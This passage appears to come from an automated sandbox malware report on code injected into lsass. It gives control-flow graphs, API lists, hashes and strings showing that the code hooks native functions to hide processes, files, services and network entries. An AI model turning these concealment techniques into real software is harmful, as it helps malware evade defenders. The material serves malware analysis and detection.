                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                  • String ID:
                                                  • API String ID: 1683269324-0
                                                  • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                  • Instruction ID: 3ba806e3e51b1b0dcb359024cf54f050519727a8cf8c5b8b8f5a43b5e8428739
                                                  • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                  • Instruction Fuzzy Hash: BA115E30A9478082F7639B23B9153D922D4B79C765FB041249F4E875B1EF78C844C2C2

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00000140AE861628: GetProcessHeap.KERNEL32 ref: 00000140AE861633
                                                    • Part of subcall function 00000140AE861628: HeapAlloc.KERNEL32 ref: 00000140AE861642
                                                    • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616B2
                                                    • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616DF
                                                    • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8616F9
                                                    • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861719
                                                    • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861734
                                                    • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861754
                                                    • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE86176F
                                                    • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86178F
                                                    • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8617AA
                                                    • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8617CA
                                                  • Sleep.KERNEL32 ref: 00000140AE861AD7
                                                  • SleepEx.KERNELBASE ref: 00000140AE861ADD
                                                    • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8617E5
                                                    • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861805
                                                    • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861820
                                                    • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861840
                                                    • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE86185B
                                                    • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86187B
                                                    • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861896
                                                    • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8618A0
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$HeapSleep$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1534210851-0
                                                  • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                  • Instruction ID: 326f40d2db6ff263f8e0a940b391fb73a78b65f37836ebd93bce5d4d1fbe3847
                                                  • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                  • Instruction Fuzzy Hash: 2631CC7128074181FF529B27DA513E963A5AB8CBE4F2858219F1E877B7EF34CC51C292

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 176 140adfc273c-140adfc27a4 call 140adfc29d4 * 4 185 140adfc27aa-140adfc27ad 176->185 186 140adfc29b2 176->186 185->186 188 140adfc27b3-140adfc27b6 185->188 187 140adfc29b4-140adfc29d0 186->187 188->186 189 140adfc27bc-140adfc27bf 188->189 189->186 190 140adfc27c5-140adfc27e6 189->190 190->186 192 140adfc27ec-140adfc280c 190->192 193 140adfc280e-140adfc2836 192->193 194 140adfc2838-140adfc283f 192->194 193->193 193->194 195 140adfc28df-140adfc28e6 194->195 196 140adfc2845-140adfc2852 194->196 198 140adfc28ec-140adfc2901 195->198 199 140adfc2992-140adfc29b0 195->199 196->195 197 140adfc2858-140adfc286a LoadLibraryA 196->197 200 140adfc286c-140adfc2878 197->200 201 140adfc28ca-140adfc28d2 197->201 198->199 202 140adfc2907 198->202 199->187 204 140adfc28c5-140adfc28c8 200->204 201->197 205 140adfc28d4-140adfc28d9 201->205 203 140adfc290d-140adfc2921 202->203 207 140adfc2982-140adfc298c 203->207 208 140adfc2923-140adfc2934 203->208 204->201 209 140adfc287a-140adfc287d 204->209 205->195 207->199 207->203 210 140adfc293f-140adfc2943 208->210 211 140adfc2936-140adfc293d 208->211 212 140adfc287f-140adfc28a5 209->212 213 140adfc28a7-140adfc28b7 209->213 216 140adfc294d-140adfc2951 210->216 217 140adfc2945-140adfc294b 210->217 215 140adfc2970-140adfc2980 211->215 218 140adfc28ba-140adfc28c1 212->218 213->218 215->207 215->208 219 140adfc2963-140adfc2967 216->219 220 140adfc2953-140adfc2961 216->220 217->215 218->204 219->215 222 140adfc2969-140adfc296c 219->222 220->215 222->215
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                  • Instruction ID: 06fb5e1ef4416040f010e1a7d6ba73e71e6e03eebacef6a42692c0d9d5c867cd
                                                  • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                  • Instruction Fuzzy Hash: 10610732B2179887DB65CF1690407AE7393FB58B98F688121DF5907BD4DA38D863E700

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 484 140ae862b2c-140ae862ba5 call 140ae882ce0 487 140ae862ee0-140ae862f03 484->487 488 140ae862bab-140ae862bb1 484->488 488->487 489 140ae862bb7-140ae862bba 488->489 489->487 490 140ae862bc0-140ae862bc3 489->490 490->487 491 140ae862bc9-140ae862bd9 GetModuleHandleA 490->491 492 140ae862bed 491->492 493 140ae862bdb-140ae862beb call 140ae876090 491->493 495 140ae862bf0-140ae862c0e 492->495 493->495 495->487 498 140ae862c14-140ae862c33 StrCmpNIW 495->498 498->487 499 140ae862c39-140ae862c3d 498->499 499->487 500 140ae862c43-140ae862c4d 499->500 500->487 501 140ae862c53-140ae862c5a 500->501 501->487 502 140ae862c60-140ae862c73 501->502 503 140ae862c75-140ae862c81 502->503 504 140ae862c83 502->504 505 140ae862c86-140ae862c8a 503->505 504->505 506 140ae862c8c-140ae862c98 505->506 507 140ae862c9a 505->507 508 140ae862c9d-140ae862ca7 506->508 507->508 509 140ae862d9d-140ae862da1 508->509 510 140ae862cad-140ae862cb0 508->510 511 140ae862da7-140ae862daa 509->511 512 140ae862ed2-140ae862eda 509->512 513 140ae862cc2-140ae862ccc 510->513 514 140ae862cb2-140ae862cbf call 140ae86199c 510->514 515 140ae862dac-140ae862db8 call 140ae86199c 511->515 516 140ae862dbb-140ae862dc5 511->516 512->487 512->502 518 140ae862d00-140ae862d0a 513->518 519 140ae862cce-140ae862cdb 513->519 514->513 515->516 523 140ae862dc7-140ae862dd4 516->523 524 140ae862df5-140ae862df8 516->524 520 140ae862d0c-140ae862d19 518->520 521 140ae862d3a-140ae862d3d 518->521 519->518 526 140ae862cdd-140ae862cea 519->526 520->521 527 140ae862d1b-140ae862d28 520->527 528 140ae862d3f-140ae862d49 call 140ae861bbc 521->528 529 140ae862d4b-140ae862d58 lstrlenW 521->529 523->524 531 140ae862dd6-140ae862de3 523->531 532 140ae862e05-140ae862e12 lstrlenW 524->532 533 140ae862dfa-140ae862e03 call 140ae861bbc 524->533 534 140ae862ced-140ae862cf3 526->534 539 140ae862d2b-140ae862d31 527->539 528->529 535 140ae862d93-140ae862d98 528->535 541 140ae862d5a-140ae862d64 529->541 542 140ae862d7b-140ae862d8d call 140ae863844 529->542 543 140ae862de6-140ae862dec 531->543 537 140ae862e14-140ae862e1e 532->537 538 140ae862e35-140ae862e3f call 140ae863844 532->538 533->532 554 140ae862e4a-140ae862e55 533->554 534->535 536 140ae862cf9-140ae862cfe 534->536 547 140ae862e42-140ae862e44 535->547 536->518 536->534 537->538 548 140ae862e20-140ae862e33 call 140ae86152c 537->548 538->547 539->535 549 140ae862d33-140ae862d38 539->549 541->542 552 140ae862d66-140ae862d79 call 140ae86152c 541->552 542->535 542->547 553 140ae862dee-140ae862df3 543->553 543->554 547->512 547->554 548->538 548->554 549->521 549->539 552->535 552->542 553->524 553->543 558 140ae862e57-140ae862e5b 554->558 559 140ae862ecc-140ae862ed0 554->559 562 140ae862e63-140ae862e7d call 140ae8685c0 558->562 563 140ae862e5d-140ae862e61 558->563 559->512 565 140ae862e80-140ae862e83 562->565 563->562 563->565 567 140ae862ea6-140ae862ea9 565->567 568 140ae862e85-140ae862ea3 call 140ae8685c0 565->568 567->559 571 140ae862eab-140ae862ec9 call 140ae8685c0 567->571 568->567 571->559
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                  • Instruction ID: bf2ef32ac57e5f465ce725a7a74baab9ea04f71ed1d086599ba6561ce8fa9f42
                                                  • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                  • Instruction Fuzzy Hash: 2AB19E72250B5486EB668F2BD4407E9A3A5FB48BA4F645066EF4D53BB5DF34CC40C382
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                  • Instruction ID: 1503c4d1f0e9a2face0525283fdd9087e61cbfeab21d2c89dc1035b309a16709
                                                  • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                  • Instruction Fuzzy Hash: 2131A372245B808AEB618F61E8407ED7361F788754F64442ADF4D47BA8EF38C948C790
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                  • Instruction ID: f4b3617ef55b8c279f228a1357564ad9138b4f9cc27f1e8a361b5862f6d2fb0c
                                                  • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                  • Instruction Fuzzy Hash: 9C314E32654B8086EB619F26E8403DE73A4F789764F600125EF9D47BB8EF38C945CB81

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 106492572-2879589442
                                                  • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                  • Instruction ID: 4cb465b735a6020238bf1ea048d5c89955278629e63a0cab2664c088472f563d
                                                  • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                  • Instruction Fuzzy Hash: 5771E736750B10C6EB129F66E8906D933A5FB89BA8F201121DF4E97B79DF38C844C781

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                  • Instruction ID: eaf29793312f880262aa33c4d225e9377ef8ac7c3781aeeffa93a87445d713dc
                                                  • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                  • Instruction Fuzzy Hash: B5516C32640B8486EB56CF62E54839AB7A1F78DBA9F244124DF4D07B29DF3CC445C791

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                  • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                  • API String ID: 4175298099-1975688563
                                                  • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                  • Instruction ID: 2267be31c3c8b37de2fa04f2787d19f37c5545ab8d6e24567a23a1f44e334d39
                                                  • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                  • Instruction Fuzzy Hash: 3531A574580B4AA0EA07EB6BE8516E47321BB5D3B4FF05413AE0D131B69F788E49C3D2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 326 140adfc6910-140adfc6916 327 140adfc6918-140adfc691b 326->327 328 140adfc6951-140adfc695b 326->328 329 140adfc691d-140adfc6920 327->329 330 140adfc6945-140adfc6984 call 140adfc6fc0 327->330 331 140adfc6a78-140adfc6a8d 328->331 332 140adfc6938 __scrt_dllmain_crt_thread_attach 329->332 333 140adfc6922-140adfc6925 329->333 349 140adfc698a-140adfc699f call 140adfc6e54 330->349 350 140adfc6a52 330->350 334 140adfc6a9c-140adfc6ab6 call 140adfc6e54 331->334 335 140adfc6a8f 331->335 341 140adfc693d-140adfc6944 332->341 337 140adfc6927-140adfc6930 333->337 338 140adfc6931-140adfc6936 call 140adfc6f04 333->338 347 140adfc6aef-140adfc6b20 call 140adfc7190 334->347 348 140adfc6ab8-140adfc6aed call 140adfc6f7c call 140adfc6e1c call 140adfc7318 call 140adfc7130 call 140adfc7154 call 140adfc6fac 334->348 339 140adfc6a91-140adfc6a9b 335->339 338->341 360 140adfc6b31-140adfc6b37 347->360 361 140adfc6b22-140adfc6b28 347->361 348->339 358 140adfc6a6a-140adfc6a77 call 140adfc7190 349->358 359 140adfc69a5-140adfc69b6 call 140adfc6ec4 349->359 354 140adfc6a54-140adfc6a69 350->354 358->331 376 140adfc69b8-140adfc69dc call 140adfc72dc call 140adfc6e0c call 140adfc6e38 call 140adfcac0c 359->376 377 140adfc6a07-140adfc6a11 call 140adfc7130 359->377 366 140adfc6b7e-140adfc6b94 call 140adfc268c 360->366 367 140adfc6b39-140adfc6b43 360->367 361->360 365 140adfc6b2a-140adfc6b2c 361->365 372 140adfc6c1f-140adfc6c2c 365->372 387 140adfc6bcc-140adfc6bce 366->387 388 140adfc6b96-140adfc6b98 366->388 373 140adfc6b4f-140adfc6b5d call 140adfd5780 367->373 374 140adfc6b45-140adfc6b4d 367->374 379 140adfc6b63-140adfc6b78 call 140adfc6910 373->379 391 140adfc6c15-140adfc6c1d 373->391 374->379 376->377 429 140adfc69de-140adfc69e5 __scrt_dllmain_after_initialize_c 376->429 377->350 399 140adfc6a13-140adfc6a1f call 140adfc7180 377->399 379->366 379->391 389 140adfc6bd5-140adfc6bea call 140adfc6910 387->389 390 140adfc6bd0-140adfc6bd3 387->390 388->387 396 140adfc6b9a-140adfc6bbc call 140adfc268c call 140adfc6a78 388->396 389->391 408 140adfc6bec-140adfc6bf6 389->408 390->389 390->391 391->372 396->387 423 140adfc6bbe-140adfc6bc6 call 140adfd5780 396->423 416 140adfc6a45-140adfc6a50 399->416 417 140adfc6a21-140adfc6a2b call 140adfc7098 399->417 413 140adfc6bf8-140adfc6bff 408->413 414 140adfc6c01-140adfc6c11 call 140adfd5780 408->414 413->391 414->391 416->354 417->416 428 140adfc6a2d-140adfc6a3b 417->428 423->387 428->416 429->377 430 140adfc69e7-140adfc6a04 call 140adfcabc8 429->430 430->377
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3352596228.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140adfc0000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                  • API String ID: 190073905-1786718095
                                                  • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                  • Instruction ID: 79a856343edf9d6588f3d0cd2b4f253cfe509a1624521d714eea0eda72951458
                                                  • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                  • Instruction Fuzzy Hash: FC81E23162834987F656AB6798403DB72A3EF8D784F3440259B69477B6DB38C867B300

                                                  Control-flow Graph

                                                  APIs
                                                  • GetLastError.KERNEL32 ref: 00000140AE86CE37
                                                  • FlsGetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE4C
                                                  • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE6D
                                                  • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE9A
                                                  • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CEAB
                                                  • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CEBC
                                                  • SetLastError.KERNEL32 ref: 00000140AE86CED7
                                                  • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF0D
                                                  • FlsSetValue.KERNEL32(?,?,00000001,00000140AE86ECCC,?,?,?,?,00000140AE86BF9F,?,?,?,?,?,00000140AE867AB0), ref: 00000140AE86CF2C
                                                    • Part of subcall function 00000140AE86D6CC: HeapAlloc.KERNEL32 ref: 00000140AE86D721
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF54
                                                    • Part of subcall function 00000140AE86D744: HeapFree.KERNEL32 ref: 00000140AE86D75A
                                                    • Part of subcall function 00000140AE86D744: GetLastError.KERNEL32 ref: 00000140AE86D764
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF65
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF76
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Value$ErrorLast$Heap$AllocFree
                                                  • String ID:
                                                  • API String ID: 570795689-0
                                                  • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                  • Instruction ID: b2b40885048b18a77dd749f130d094d7928ae544b3603784d23cb63539606b23
                                                  • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                  • Instruction Fuzzy Hash: 0941183028174441FA6BAB6799553E922926B5C7B0F744B24AF3E4B6F6DE789C01C2C3

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                  • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                  • API String ID: 2171963597-1373409510
                                                  • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                  • Instruction ID: d526e0782f541ea269add2dfc30b9375b8e19e2713657146a865421fd34f2e67
                                                  • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                  • Instruction Fuzzy Hash: FB213936654B40C2EB11CB26E54839A77A1F789BA4F600215EF5D03BB8CF3CC949CB41

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 705 140ae86a544-140ae86a5ac call 140ae86b414 708 140ae86a5b2-140ae86a5b5 705->708 709 140ae86aa13-140ae86aa1b call 140ae86c748 705->709 708->709 710 140ae86a5bb-140ae86a5c1 708->710 712 140ae86a5c7-140ae86a5cb 710->712 713 140ae86a690-140ae86a6a2 710->713 712->713 717 140ae86a5d1-140ae86a5dc 712->717 715 140ae86a963-140ae86a967 713->715 716 140ae86a6a8-140ae86a6ac 713->716 718 140ae86a9a0-140ae86a9aa call 140ae869634 715->718 719 140ae86a969-140ae86a970 715->719 716->715 720 140ae86a6b2-140ae86a6bd 716->720 717->713 721 140ae86a5e2-140ae86a5e7 717->721 718->709 731 140ae86a9ac-140ae86a9cb call 140ae867940 718->731 719->709 722 140ae86a976-140ae86a99b call 140ae86aa1c 719->722 720->715 724 140ae86a6c3-140ae86a6ca 720->724 721->713 725 140ae86a5ed-140ae86a5f7 call 140ae869634 721->725 722->718 728 140ae86a894-140ae86a8a0 724->728 729 140ae86a6d0-140ae86a707 call 140ae869a10 724->729 725->731 739 140ae86a5fd-140ae86a628 call 140ae869634 * 2 call 140ae869d24 725->739 728->718 732 140ae86a8a6-140ae86a8aa 728->732 729->728 744 140ae86a70d-140ae86a715 729->744 736 140ae86a8ac-140ae86a8b8 call 140ae869ce4 732->736 737 140ae86a8ba-140ae86a8c2 732->737 736->737 753 140ae86a8db-140ae86a8e3 736->753 737->718 743 140ae86a8c8-140ae86a8d5 call 140ae8698b4 737->743 773 140ae86a62a-140ae86a62e 739->773 774 140ae86a648-140ae86a652 call 140ae869634 739->774 743->718 743->753 745 140ae86a719-140ae86a74b 744->745 750 140ae86a887-140ae86a88e 745->750 751 140ae86a751-140ae86a75c 745->751 750->728 750->745 751->750 754 140ae86a762-140ae86a77b 751->754 755 140ae86a9f6-140ae86aa12 call 140ae869634 * 2 call 140ae86c6a8 753->755 756 140ae86a8e9-140ae86a8ed 753->756 758 140ae86a874-140ae86a879 754->758 759 140ae86a781-140ae86a7c6 call 140ae869cf8 * 2 754->759 755->709 760 140ae86a900 756->760 761 140ae86a8ef-140ae86a8fe call 140ae869ce4 756->761 764 140ae86a884 758->764 786 140ae86a804-140ae86a80a 759->786 787 140ae86a7c8-140ae86a7ee call 140ae869cf8 call 140ae86ac38 759->787 769 140ae86a903-140ae86a90d call 140ae86b4ac 760->769 761->769 764->750 769->718 784 140ae86a913-140ae86a961 call 140ae869944 call 140ae869b50 769->784 773->774 778 140ae86a630-140ae86a63b 773->778 774->713 790 140ae86a654-140ae86a674 call 140ae869634 * 2 call 140ae86b4ac 774->790 778->774 783 140ae86a63d-140ae86a642 778->783 783->709 783->774 784->718 794 140ae86a80c-140ae86a810 786->794 795 140ae86a87b 786->795 806 140ae86a815-140ae86a872 call 140ae86a470 787->806 807 140ae86a7f0-140ae86a802 787->807 811 140ae86a676-140ae86a680 call 140ae86b59c 790->811 812 140ae86a68b 790->812 794->759 796 140ae86a880 795->796 796->764 806->796 807->786 807->787 815 140ae86a686-140ae86a9ef call 140ae8692ac call 140ae86aff4 call 140ae8694a0 811->815 816 140ae86a9f0-140ae86a9f5 call 140ae86c6a8 811->816 812->713 815->816 816->755
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                  • Instruction ID: 7b4ba636362c0b5caa681dd8b7c7e919a21c7b74d1dcc59cd2284cb1c0ce2a62
                                                  • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                  • Instruction Fuzzy Hash: 80E1B5726447408AEB62DF66D4803DD77A0F74DBA8F200156EF9D57BA9CB38C881D782

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 584 140adfc9944-140adfc99ac call 140adfca814 587 140adfc99b2-140adfc99b5 584->587 588 140adfc9e13-140adfc9e1b call 140adfcbb48 584->588 587->588 589 140adfc99bb-140adfc99c1 587->589 591 140adfc99c7-140adfc99cb 589->591 592 140adfc9a90-140adfc9aa2 589->592 591->592 596 140adfc99d1-140adfc99dc 591->596 594 140adfc9aa8-140adfc9aac 592->594 595 140adfc9d63-140adfc9d67 592->595 594->595 597 140adfc9ab2-140adfc9abd 594->597 599 140adfc9d69-140adfc9d70 595->599 600 140adfc9da0-140adfc9daa call 140adfc8a34 595->600 596->592 598 140adfc99e2-140adfc99e7 596->598 597->595 602 140adfc9ac3-140adfc9aca 597->602 598->592 603 140adfc99ed-140adfc99f7 call 140adfc8a34 598->603 599->588 604 140adfc9d76-140adfc9d9b call 140adfc9e1c 599->604 600->588 610 140adfc9dac-140adfc9dcb call 140adfc6d40 600->610 607 140adfc9c94-140adfc9ca0 602->607 608 140adfc9ad0-140adfc9b07 call 140adfc8e10 602->608 603->610 618 140adfc99fd-140adfc9a28 call 140adfc8a34 * 2 call 140adfc9124 603->618 604->600 607->600 611 140adfc9ca6-140adfc9caa 607->611 608->607 622 140adfc9b0d-140adfc9b15 608->622 615 140adfc9cac-140adfc9cb8 call 